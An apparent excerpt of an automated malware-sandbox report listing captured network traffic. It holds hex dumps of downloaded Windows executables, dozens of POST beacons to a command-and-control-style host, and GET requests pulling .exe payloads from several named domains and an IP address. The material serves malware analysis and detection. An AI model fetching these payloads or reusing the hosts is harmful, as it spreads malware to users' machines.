f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:05 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 13:00:11 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 11:02:40 GMTETag: "57200-5d588bdcf8dca"Accept-Ranges: bytesContent-Length: 356864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 e4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 13:00:14 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Thu, 13 Jan 2022 16:32:58 GMTETag: "6e600-5d5793d3df2ef"Accept-Ranges: bytesContent-Length: 452096Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 15 67 78 67 74 09 2b 67 74 09 2b 67 74 09 2b b4 06 0a 2a 6d 74 09 2b b4 06 0c 2a eb 74 09 2b b4 06 0d 2a 73 74 09 2b 35 01 0c 2a 41 74 09 2b 35 01 0d 2a 76 74 09 2b 35 01 0a 2a 75 74 09 2b b4 06 08 2a 64 74 09 2b 67 74 08 2b 30 74 09 2b d2 01 0c 2a 66 74 09 2b d2 01 f6 2b 66 74 09 2b 67 74 9e 2b 66 74 09 2b d2 01 0b 2a 66 74 09 2b 52 69 63 68 67 74 09 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 3a 54 e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 d0 00 00 00 ec 0f 00 00 00 00 00 00 10 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 15 00 00 04 00 00 19 a2 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c ec 10 00 a4 00 00 00 00 20 0f 00 1d a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 2d 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 10 00 00 00 76 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 60 00 00 00 e0 00 00 00 2a 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 e0 0d 00 00 40 01 00 00 0a 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 01 00 00 20 0f 00 00 a4 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 10 00 00 00 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 a0 04 00 00 e0 10 00 00 94 04 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 80 15 00 00 00 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 13:00:15 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMTETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648Content-Type: application/x-msdownloadData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doekvpclh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cfaivcludy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydoois.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpiiaqw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aoblnua.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://riacbys.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elxvnyxk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcvlfhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrbmaiqv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqgqp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fenydm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://firfcooyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwudvrtrt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omhff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbfbuopuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdhmpp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyvmhh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://carudedeao.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihkfjyj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqcnkaq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbxmbl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecbfled.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emncntmtow.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsefotqodc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbnpyehjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pehjgpd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpoejhbse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xemsp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: host-data-coin-11.com
